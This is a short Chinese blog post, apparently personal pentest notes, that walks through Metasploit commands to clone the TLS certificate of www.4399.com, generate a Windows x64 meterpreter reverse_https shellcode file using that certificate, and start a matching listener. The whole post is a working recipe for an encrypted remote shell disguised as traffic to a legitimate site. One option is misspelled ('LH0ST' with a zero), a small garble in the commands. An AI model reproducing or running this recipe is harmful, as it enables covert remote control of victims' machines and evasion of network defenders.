msf生成reverse_https的payload

制作证书

进入 msfconsole

1
2
3
use auxiliary/gather/impersonate_ssl
set rhosts www.4399.com
run

记录证书的位置
cert_4399.pem

生成payload

1
2
3
4
5
6
use payload/windows/x64/meterpreter_reverse_https
set stagerverifysslcert 1
set handlersslcert cert_4399.pem
set lhost 192.168.79.137
set lport 24400
generate -f raw -o sc_m10090.bin

开启监听

1
2
3
4
5
6
7
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set HANDLERSSLCERT cert_4399.pem
set STAGERVERIFYSSLCERT true
set LPORT 24400
set LH0ST 192.168.79.137
run -j

msf生成reverse_https的payload
https://tsy244.github.io/2024/09/19/渗透/msf生成reverse-https的payload/
Author
August Rosenberg
Posted on
September 19, 2024
Licensed under